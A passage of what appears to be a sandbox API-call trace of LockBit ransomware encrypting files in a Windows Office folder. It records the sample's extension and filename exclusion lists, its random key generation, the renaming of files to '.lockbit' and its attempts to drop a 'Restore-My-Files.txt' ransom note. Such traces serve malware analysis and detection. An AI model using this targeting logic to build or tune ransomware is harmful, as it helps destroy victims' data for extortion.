[0175.392] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.393] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.393] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00452_.WMF.lockbit") returned 72 [0175.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00452_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00452_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.398] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.398] malloc (_Size=0x40068) returned 0x3d70450 [0175.398] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2168) returned 1 [0175.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0175.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0175.399] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0175.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00452_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00452_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.402] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.402] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.404] free (_Block=0x1fa2ed8) [0175.404] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00452_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.404] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.404] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.404] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d2000, ftCreationTime.dwHighDateTime=0x1bd4b2d, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x96d2000, ftLastWriteTime.dwHighDateTime=0x1bd4b2d, nFileSizeHigh=0x0, nFileSizeLow=0x59ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00453_.WMF", cAlternateFileName="")) returned 1 [0175.404] lstrcmpiW (lpString1=".", lpString2="SO00453_.WMF") returned -1 [0175.404] lstrcmpiW (lpString1="..", lpString2="SO00453_.WMF") returned -1 [0175.404] PathFindExtensionW (pszPath="SO00453_.WMF") returned=".WMF" [0175.404] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.404] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.404] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.404] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.404] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.404] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.404] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.404] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.405] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.406] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.406] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00453_.WMF") returned -1 [0175.407] lstrcmpiW (lpString1="ntldr", lpString2="SO00453_.WMF") returned -1 [0175.407] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00453_.WMF") returned -1 [0175.407] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00453_.WMF") returned -1 [0175.407] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00453_.WMF") returned -1 [0175.407] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00453_.WMF") returned 1 [0175.407] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00453_.WMF") returned -1 [0175.407] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.407] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF") returned=".WMF" [0175.407] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.407] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.407] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.408] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.408] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF.lockbit") returned 72 [0175.408] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00453_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.410] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.410] malloc (_Size=0x40068) returned 0x3e70008 [0175.410] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=23020) returned 1 [0175.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0175.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0175.411] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0175.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.432] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.432] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.434] free (_Block=0x1fa2ed8) [0175.434] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.434] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.434] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa04e1b00, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa04e1b00, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xb6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00454_.WMF", cAlternateFileName="")) returned 1 [0175.434] lstrcmpiW (lpString1=".", lpString2="SO00454_.WMF") returned -1 [0175.434] lstrcmpiW (lpString1="..", lpString2="SO00454_.WMF") returned -1 [0175.434] PathFindExtensionW (pszPath="SO00454_.WMF") returned=".WMF" [0175.434] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.434] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.434] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.434] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.434] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.434] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.435] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.435] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.436] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00454_.WMF") returned -1 [0175.436] lstrcmpiW (lpString1="ntldr", lpString2="SO00454_.WMF") returned -1 [0175.436] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00454_.WMF") returned -1 [0175.436] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00454_.WMF") returned -1 [0175.436] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00454_.WMF") returned -1 [0175.437] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00454_.WMF") returned 1 [0175.437] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00454_.WMF") returned -1 [0175.437] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.437] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00454_.WMF") returned=".WMF" [0175.437] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.437] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.437] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.438] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.438] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00454_.WMF.lockbit") returned 72 [0175.438] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00454_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00454_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.441] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.441] malloc (_Size=0x40068) returned 0x3df0008 [0175.441] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2924) returned 1 [0175.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.441] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.442] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.443] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00454_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00454_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.443] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.443] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.446] free (_Block=0x1fa2ed8) [0175.446] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00454_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.446] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.446] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00466_.WMF", cAlternateFileName="")) returned 1 [0175.446] lstrcmpiW (lpString1=".", lpString2="SO00466_.WMF") returned -1 [0175.446] lstrcmpiW (lpString1="..", lpString2="SO00466_.WMF") returned -1 [0175.446] PathFindExtensionW (pszPath="SO00466_.WMF") returned=".WMF" [0175.446] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.446] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".hta", 